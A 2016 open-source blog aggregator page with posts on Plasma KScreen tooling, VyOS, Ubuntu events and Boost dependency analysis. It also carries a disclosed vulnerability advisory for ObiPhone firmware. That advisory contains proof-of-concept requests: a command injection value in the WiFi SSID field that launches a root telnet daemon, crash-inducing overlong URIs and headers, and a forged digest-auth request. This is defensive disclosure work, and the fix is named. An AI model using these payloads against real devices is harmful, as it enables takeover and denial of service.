August 24, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Sebastian Kügler: Multisceen in Plasma: Improved tools and debugging

cube-small
Plasma 5.8 will be our first long-term supported release in the Plasma 5 series. We want to make this a release as polished and stable as possible. One area we weren’t quite happy with was our multi-screen user experience. While it works quite well for most of our users, there were a number of problems which made our multi-screen support sub-par.
Let’s take a step back to define what we’re talking about.

Multi-screen support means that connecting more than one screen to your computer. The following use cases give good examples of the scope:

  • Static workstation A desktop computer with more than one display connected, the desktop typically spans both screens to give more screen real estate.
  • Docking station A laptop computer that is hooked up to a docking station with additional displays connected. This is a more interesting case, since different configurations may be picked depending on whether the laptop’s lid is closed or not, and how the user switches between displays.
  • Projector The computer is connected to a projector or TV.

The idea is that the user plugs in or starts up with that configuration, if the user has already configured this hardware combination, this setup is restored. Otherwise, a reasonable guess is done to put the user to a good starting point to fine-tune the setup.

kcm-videowall
This is the job of KScreen. At a technical level, kscreen consists of three parts:

  • system settings module This can be reached through system settings
  • kscreen daemon Run in a background process, this component saves, restores and creates initial screen configurations.
  • libkscreen This is the library providing the screen setup reading and writing API. It has backends for X11, Wayland, and others that allow to talk to the exact same programming interface, independent of the display server in use.

At an architectural level, this is a sound design: the roles are clearly separated, the low-level bits are suitably abstracted to allow re-use of code, the API presents what matters to the user, implementation details are hidden. Most importantly, aside from a few bugs, it works as expected, and in principle, there’s no reason why it shouldn’t.

So much for the theory. In reality, we’re dealing with a huge amount of complexity. There are hardware events such as suspending, waking up with different configurations, the laptop’s lid may be closed or opened (and when that’s done, we don’t even get an event that it closed, displays come and go, depending on their connection, the same piece of hardware might support completely different resolutions, hardware comes with broken EDID information, display connectors come and go, so do display controllers (crtcs); and on top of all that: the only way we get to know what actually works in reality for the user is the “throw stuff against the wall and observe what sticks” tactic.

This is the fabric of nightmares. Since I prefer to not sleep, but hack at night, I seemed to be the right person to send into this battle. (Coincidentally, I was also “crowned” kscreen maintainer a few months ago, but let’s stick to drama here.)

So, anyway, as I already mentioned in an earlier blog entry, we had some problems restoring configurations. In certain situations, displays weren’t enabled or positioned unreliably, or kscreen failed to restore configurations altogether, making it “forget” settings.
kscreen-doctor

Better tools

Debugging these issues is not entirely trivial. We need to figure out at which level they happen (for example in our xrandr implementation, in other parts of the library, or in the daemon. We also need to figure out what happens exactly, and when it does. A complex architecture like this brings a number of synchronization problems with it, and these are hard to debug when you have to figure out what exactly goes on across log files. In Plasma 5.8, kscreen will log its activity into one consolidated, categorized and time-stamped log. This rather simple change has already been a huge help in getting to know what’s really going on, and it has helped us identify a number of problems.

A tool which I’ve been working on is kscreen-doctor. On the one hand, I needed a debugging helper tool that can give system information useful for debugging. Perhaps more importantly I know I’d be missing a command-line tool to futz around with screen configurations from the command-line or from scripts as Wayland arrives. kscreen-doctor allows to change the screen configuration at runtime, like this:

Disable the hdmi output, enable the laptop panel and set it to a specific mode
$ kscreen-doctor output.HDMI-2.disable output.eDP-1.mode.1 output.eDP-1.enable

Position the hdmi monitor on the right of the laptop panel
$ kscreen-doctor output.HDMI-2.position.0,1280 output.eDP-1.position.0,0

Please note that kscreen-doctor is quite experimental. It’s a tool that allows to shoot yourself in the foot, so user discretion is advised. If you break things, you get to keep the pieces. I’d like to develop this into a more stable tool in kscreen, but for now: don’t complain if it doesn’t work or eat your hamster.

Another neat testing tool is Wayland. The video wall configuration you see in the screenshot is unfortunately not real hardware I have around here. What I’ve done instead is run a Wayland server with these “virtual displays” connected, which in turn allowed me to reproduce a configuration issue. I’ll spare you the details of what exactly went wrong, but this kind of tricks allows us to reproduce problems with much more hardware than I ever want or need in my office. It doesn’t stop there, I’ve added this hardware configuration to our unit-testing suite, so we can make sure that this case is covered and working in the future.

24 August, 2016 01:16PM

August 23, 2016

Aaron Honeycutt: Razer Hardware on Linux

One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer Blackwidow Chroma. For those who do not know about it: pretty link . It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on github to make it work on Ubuntu/Linux Mint, Debian and a few others maybe since the source is available here: source link

Here is what the application looks like:
polychromatic-ss1

It even has a tray applet to change the colors, and effects quickly.

23 August, 2016 08:40PM

hackergotchi for VyOS

VyOS

vyos.net → wiki.vyos.net redirect

You may have noticed (or will notice soon) that http://vyos.net redirects to http://wiki.vyos.net. Don't worry, this is normal.

It's the first step in preparation to roll out the new website. When it goes live, the vyos.net and vyos.io domains will point to the new website, and the wiki will live on its own wiki.vyos.(net|io) domain.

Meanwhile you can view the future website at http://vyos.io/ and give us your feedback, if you haven't already.


23 August, 2016 08:04PM

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Webinar: Industry 4.0 & IoT

Webinar 3 - CloudPlugs

We’ll be hosting our next webinar on Industry 4.0 and IoT!

This webinar will explore the convergence of Operational and Information technology as one of the key benefits of the Internet of Things; and how to use this convergence as a way to build a new generation of integrated digital supply chains which are the base of Industry 4.0.

The webinar will cover the following topics:

  • Industry 4.0 and IoT Trends
  • Higher efficiency and productivity through end to end integrated digital supply chains
  • New business opportunities for all players in the manufacturing supply chain
  • Real life examples on industrial process improvements through the use of IoT

Sign-up here

About the speaker: Jimmy Garcia-Meza is the co-founder and CEO of CloudPlugs Inc. He has over 20 years of experience running startups and large divisions in private and public U.S. multinational companies. He co-founded nubisio, Inc. a cloud storage company acquired by Bain Capital. He was CEO of FilesX, a backup software company acquired by IBM. He held various executive positions at Silicon Image (SIMG) where he was responsible for driving the world-wide adoption of HDMI. He was a venture director at Index Ventures and held several executive positions at Sun Microsystems where he has in charge of a $1.7B global line of business.

23 August, 2016 03:38PM

Ubuntu Insights: M10 Travel Light winners!

140_M10_TravelLight_Comp_v02_#TravelLight (3)

We had an awesome selection of entries for our #TravelLight competition!

Given that the M10 tablet can also be your laptop, saving you 1.5kg compared to the average laptop, we asked you…

What would you take with you on holiday if you had 1.5kg of extra space in your luggage?

Thank you to all those that participated, we had a laugh reading them! It wasn’t easy but we narrowed down our winners to the following:

Primary winners (Prize: M10 Tablet)

Gabriel Lucas

Andrea Souviron

Other winners (Prize: Strauss bluetooth speaker)

Adnan Quaium

Zakaria Bouzid

Bouslikhin saad

Johnny Chin

Bruce Cozine

Learn about the M10

23 August, 2016 03:19PM

Jono Bacon: Bacon Roundup – 23rd August 2016

Well, hello there, people. I am back with another Bacon Roundup which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox.

Also, don’t forget that I am doing a Reddit AMA (Ask Me Anything) on Tues 30th August 2016 at 9am Pacific. Find out the details here.

Without further ado, the roundup:

Building a Career in Open Source (opensource.com)
A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning/evolving, and more. If you aspire to work in open source, be sure to check it out.

Cutting the Cord With Playstation Vue (jonobacon.org)
At home we recently severed ties with DirecTV (for lots of reasons, this being one), and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action.

Running a Hackathon for Security Hackers (jonobacon.org)
Recently I have been working with HackerOne and we recently ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down.

Opening Up Data Science with data.world (jonobacon.org)
Recently I have also been working with data.world who are building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data, the potential for data.world, and what the future might hold for a true data community.

From The Archive

To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here.

Using behavioral patterns to build awesome communities (opensource.com)
Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation in which we build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization.

Atom: My New Favorite Code Editor (jonobacon.org)
Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install.

Ultimate unconference survival guide (opensource.com)
Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can though, be a little complicated to figure out for attendees. Here’s some tips on getting the most out of them.

Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe.

The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon.

23 August, 2016 01:48PM

hackergotchi for VyOS

VyOS

VyOS Project news

Hello, Community!

We have some great news to share! 

As some of you may already know, we are planning to run virtual meeting event for VyOS devs and users in near future.

So in case you want to participate, just fill up this form and of course join us on our dev. portal to stay in touch.

May admit that this summer is productive in all aspects:

Tremendous work towards VyOS 1.2 done and we going to present 1.2.0 beta 2 in some weeks! Thanks, to our super team!

We revived OVA distribution of VyOS some months ago and continued work in the direction of extensive VMWare Platform support; we also plan to deliver supported images for all other standard hypervisors like KVM, MS Hyper-V and VyOS on clouds markets for AWS, Azure, GCE.

VyOS is now available on SolidRun ClearFog device, credits for this great work to UnicronNL, this opens new applications for VyOS.

Ansible starting from version 2.2 able to configure VyOS, so if you using Ansible, give it a try! We on other hand working on standalone management library for Python.

We receive many requests regarding GUI, and yes we are listening to them. Last four months we dedicated a lot of time to studies regarding possible ways of delivery such  UI. Apart from technical challenges, there are other problems to take into account(like service providers don't want GUI, while SMBs and ROBOs show high demand). We are working to bring satisfaction to all users without sacrifices from any side. So basically yes, it will be GUI in near future, but there are not ETAs for now.  

We believe that affordable open source routing platform and NFV should be accessible to everyone out there

Want to participate???

Join us on social networks and spread the word about VyOS - Twitter, RedditFaceBook, Google+, Linkedin 

Participate in discussions on forum and of course join us on development portal 

VyOS is a community-driven Linux-based network operating system for routers and firewalls

Saludos,

Yuriy

23 August, 2016 07:14AM by Yuriy Andamasov

August 22, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Elizabeth K. Joseph: Ubuntu in Philadelphia

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.

But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I also was able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu.

Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.

Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.

Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long time LoCo member Randy Gold.

They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.


Thanks to Randy for the booth photo!

At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books.


My co-author, José Antonio Rey, signing a copy of our book!

22 August, 2016 07:53PM

hackergotchi for ArcheOS

ArcheOS

St. Paolina Visintainer. Recovering a lost smile

Thursday 9th June 2016 in Vigolo Vattaro (Trentino - Italy) was held a conference regarding the figure of S. Paolina Visintainer, who was born in this town in 1865, and in general the immigration issue. 
Among the other interesting contributions, a special mention has to be made for the work about Italian immigration in Brazil during the XIX century, presented by Cesar Augusto Prezzi, which focused on the states of Rio Grande do Sul and Santa Caterina. This research illustrated the hard journey Italian and, in general, European migrants had to face to reach the new world, often losing their relatives along the way (in many cases buried at sea), in order to escape poverty and war (a story that sadly remembers the current travel of refugees).


Ship with immigrants in Santos

Our (Arc-Team) contribution to the conference regarded a more particular topic, connected with the person of St. Paolina: her Forensic Facial Reconstruction aimed to recover her smile. Indeed Mother Paolina is remembered as a smiling and good-natured person, but, due to the fact that the only photo we have were taken in sad moments of her life, we have no representation of her more natural expression. From this singular issue, +Cícero Moraes  started to work in order to recover her lost smile, with the help of the artist Mari Bueno and Prof. José Luis Lira.
Here below I uploaded the video of the presentation I gave during the conference, in which are presented the partner of the project, the main work-flow and the final result:



while here is the clip shown in the final part of the slides:




Have a nice day!

22 August, 2016 03:48PM by Luca Bezzi (noreply@blogger.com)

hackergotchi for SparkyLinux

SparkyLinux

Enlightenment 0.21.2

 

There is an update of Enlightenment 0.21.2 ready in Sparky repository now.

Make upgrade as usually:
sudo apt-get update
sudo apt-get dist-upgrade

If you would like to make fresh installations, run:
sudo apt-get update
sudo apt-get install enlightenment

The present version of Enlightenment 0.21.2 uses EFL 1.18 and Python-EFL 1.18 (both available in our repos).

The ’emotion-generic-players’, ‘evas-generic-loaders’ and ‘elementary’ packages have been removed from Sparky repos already.

 

22 August, 2016 11:40AM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: QTS and Canonical unveil private, fully managed OpenStack cloud

QTS-export

OVERLAND PARK, KANSAS, and LONDON, U.K. (August 22, 2016) – Responding to increasing demand for flexible, open source and cost-predictable cloud solutions, QTS Realty Trust, Inc. (NYSE: QTS) and Canonical (the company behind Ubuntu, the leading operating system for container cloud, scale out, and hyperscale computing) announced today a private, fully managed OpenStack cloud solution available from any of QTS’ geographically diverse and highly secure data centers in mid-September.

Built on Ubuntu OpenStack, the world’s most popular OpenStack distribution, and using Canonical’s application modeling service Juju as well as Canonical’s Bare Metal as a Service (MaaS), QTS’ private, fully managed OpenStack cloud enables enterprise customers to perform quick and easy provisioning, orchestration, and management of cloud resources. Examples include:

  • Building software-as-a-service applications, either as new developments or as improvements upon existing solutions.
  • Serving as a base for delivering self-service storage and service on demand to users who need IT services.
  • Delivering object storage or block storage on demand.
  • Saving on licensing fees associated with virtualization technologies.

In addition to the Private Cloud Offering, QTS offer a public, multi-tenant pay-as-you-go OpenStack cloud solution that is self-provisioning, elastic and highly scalable.

“As a leading data center and IT infrastructure services provider, QTS is focused on delivering seamless hybrid cloud hosting solutions using proven, best-in-breed platform technologies,” said Anand Krishnan, Executive Vice President, Canonical Cloud. “We are pleased to support QTS’ delivery of OpenStack solutions that combine the rapid availability and elasticity of compute resources with the security and control their enterprise customers demand to support their mission critical applications and workloads.”

The new OpenStack solution is an important addition to QTS’ expanding portfolio of scalable, secure and compliant IaaS solutions and complements other QTS’ purpose-built clouds serving public sector, healthcare and enterprise workloads.

“QTS OpenStack Cloud is the latest addition as we expand our Infrastructure-as-a-Service (IaaS) offerings to create a one-stop shop for flexible IaaS and hybrid IT solutions that address increasingly diverse customer requirements,” said Jon Greaves, Chief Technology Officer, QTS. “Canonical is an industry leader in OpenStack management and technologies and we look forward to working closely as we unleash OpenStack Cloud solutions across our geographically diverse platform of integrated data centers.”

The fully managed cloud solution is being previewed at OpenStack East in New York City August 23-24 at Canonical booth # H12.

22 August, 2016 09:00AM

David Tomaschik: ObiHai ObiPhone: Multiple Vulnerabilties

Note that this a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details

Obi-1. Memory corruption leading to free() of an attacker-controlled address

By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault.

python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479d8b18 in free () from root/lib/libc.so.6
#1  0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>:        ldr     r3, [r0, #-4]
   0x479d8b1c <free+52>:        sub     r5, r0, #8
   0x479d8b20 <free+56>:        tst     r3, #2
   0x479d8b24 <free+60>:        bne     0x479d8bec <free+260>
   0x479d8b28 <free+64>:        tst     r3, #4
(gdb) i r r0
r0             0x41     65

Obi-2. Command injection in WiFi Config

An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon.

GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]

Note that telnetd is now running and accessible via user “root” with no password.

Obi-3. Denial of Service due to buffer overflow

By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test.

python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479dc440 in strcpy () from root/lib/libc.so.6
#1  0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
   0x479dc44c <strcspn>:        push    {r4, r5, r6, lr}
   0x479dc450 <strcspn+4>:      ldrb    r3, [r0]
(gdb) i r r1 r2
r1             0xb434df01       3023363841
r2             0xff     255
(gdb) p/x $r1+$r2
$1 = 0xb434e000

Obi-4. Buffer overflow in internal socket handler

Commands to be executed by realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated, however unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user.

GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]

(gdb) 
#0  0x41414140 in ?? ()
#1  0x0006dc78 in ?? ()

Obi-5. Cross-site request forgery

All portions of the web interface appear to lack any protection against Cross-Site Request Forgery. Combined with the command injection vector in ObiPhone-3, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged-in to the phone.

Obi-6. Failure to implement RFC 2617 correctly

RFC 2617 specifies HTTP digest authentication, but is not correctly implemented on the ObiPhone. The HTTP digest authentication fails to comply in the following ways:

  • The URI is not validated
  • The application does not verify that the nonce received is the one it sent
  • The application does not verify that the nc value does not repeat or go backwards

    GET / HTTP/1.1 Host: foo Authorization: Digest username=”admin”, realm=”a”, nonce=”a”, uri=”/”, algorithm=MD5, response=”309091eb609a937358a848ff817b231c”, opaque=””, qop=auth, nc=00000001, cnonce=”a” Connection: close

    HTTP/1.1 200 OK Server: OBi110 Cache-Control:must-revalidate, no-store, no-cache Content-Type: text/html Content-Length: 1108 Connection: close

Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline.

Obi-7. Invalid pointer dereference due to invalid header

Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected.

GET / HTTP/1.1
Host: foo
Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code.

(gdb) bt
#0  0x479dc438 in strcpy () from root/lib/libc.so.6
#1  0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>:       ldrb    r3, [r1, #1]!
   0x479dc43c <strcpy+12>:      cmp     r3, #0
   0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
(gdb) i r r1
r1             0xffffffff       4294967295

Obi-8. Null pointer dereference due to malicious URL

If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected.

GET /obihai-xml HTTP/1.1
Host: foo

(gdb) bt
#0  0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args: 
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>:       ldr     r2, [r1], #4
   0x479dc7f8 <strlen+8>:       ands    r3, r0, #3
   0x479dc7fc <strlen+12>:      rsb     r0, r3, #0
   0x479dc800 <strlen+16>:      beq     0x479dc818 <strlen+40>
   0x479dc804 <strlen+20>:      orr     r2, r2, #255    ; 0xff
(gdb) i r r1
r1             0x0      0

Obi-9. Denial of service due to invalid content-length

Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed” though it does not appear any attempt to update the firmware with the posted data occurred.

POST / HTTP/1.1
Host: foo
Content-Length: -1

Foo

This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application.

(gdb) bt
#0  0x00138250 in HTTPD_msg_proc ()
#1  0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>:       strb    r1, [r3, r2]
  0x138254 <HTTPD_msg_proc+400>:       ldr     r1, [r4, #24]
  0x138258 <HTTPD_msg_proc+404>:       ldr     r0, [r4, #88]   ; 0x58
  0x13825c <HTTPD_msg_proc+408>:       bl      0x135a98
  0x138260 <HTTPD_msg_proc+412>:       ldr     r0, [r4, #88]   ; 0x58
(gdb) i r r3 r2
r3             0xafcc7000       2949410816
r2             0xffffffff       4294967295

Mitigation

Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.

Author

The issues were discovered by David Tomaschik of the Google Security Team.

Timeline

  • 2016/05/12 - Reported to ObiHai
  • 2016/05/12 - Findings Acknowledged by ObiHai
  • 2016/05/20 - ObiHai reports working on patches for most issues
  • 2016/06/?? - New Firmware posted to ObiHai Website
  • 2016/08/18 - Public Disclosure

22 August, 2016 07:00AM

Paul Tagliamonte: go-wmata - golang bindings to the DC metro system

A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area, and want to interface to the WMATA data.

As a proof of concept, I wrote a yo bot called @WMATA, where it returns the closest station if you Yo it your location. For hilarity, feel free to Yo it from outside DC.

For added fun, and puns, I wrote a dbus proxy for the API as weel, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is. I’d love help with this (or pointers on how to learn how to do this right).

22 August, 2016 02:16AM

August 21, 2016

Stephen Kelly: Boost dependencies and bcp

Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here along with dot files for generating the images.

The monster diagram is here:

Edges and Incidental Modules and Packages

The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow.

In practice, packagers do not split Boost into packages like that. At least for debian packages they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package libboost1.58-dev. Perhaps the reason for packagers putting it all together is that there is little value in splitting the header-only repository content in the monolithic Boost from each other if it will all be packaged anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher level libraries (if at all).

Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules‘. The name is inspired by ‘incidental data structures’ which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages.

As far as I am aware such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer, and it wouldn’t affect how Boost is packaged.

My script for generating the dependency information is simply grepping through the include/ directory of each repository and recording the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost because Hana includes code for integration with existing Boost code.

Dependency Analysis and Reduction

One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways which some in Boost prefer – it is surprisingly fuzzy). That is useful for documentation at least, but as evidenced it appears to not be useful from a packaging point of view. So, are these diagrams useful for anything?

While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract.

Note also that these edges do not contribute time to your slow build – reducing edges in the graphs by moving files won’t make anything faster. Rewriting the implementation of certain things might, but that is not what we are talking about here.

I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size. Such a ‘subset distribution’ doesn’t need any of those. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end:

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf boostdir/libs/icl/{doc,test,example}
$ rm -rf boostdir/boost/mpl/aux_/preprocessed
$ du -hs myicl/
15M     myicl/

Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram you can see that it is quite large.

Why does ICL depend on ‘incidental spirit’? Can that dependency be removed?

For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. Too see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check if it is the one responsible for the dependency edge.

boost/libs/icl$ git grep -Pl -e include --and \
  -e "thread|spirit|pool|serial|date_time" include/
include/boost/icl/gregorian.hpp
include/boost/icl/ptime.hpp

Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers.

I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis. Other files in ICL do not include them.

boost/libs/icl$ git grep -l gregorian include/
include/boost/icl/gregorian.hpp
boost/libs/icl$ git grep -l ptime include/
include/boost/icl/ptime.hpp

As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set<double> and icl::interval_map<double>. So, I can simply delete those files.

boost/libs/icl$ git grep -l -e include \
  --and -e date_time include/boost/icl/ | xargs rm
boost/libs/icl$

and run the bcp tool again.

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
12M     myicl/

I’ve saved 3M just by understanding the dependencies a bit. Not bad!

Mostly the size difference is accounted for by no longer extracting boost::mpl::vector, and secondly the Boost.DateTime headers themselves.

The dependencies in the graph are now so few that we can consider them and wonder why they are there and can they be removed. For example, there is a dependency on the Boost.Container repository. Why is that?

include/boost/icl$ git grep -C2 -e include \
   --and -e boost/container
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/map.hpp>
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <map>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>

So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not. If we were talking about C++ code here we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common.

I know that I’m not defining that and I don’t need Boost.Container, so I can hack the code to remove those includes, eg:

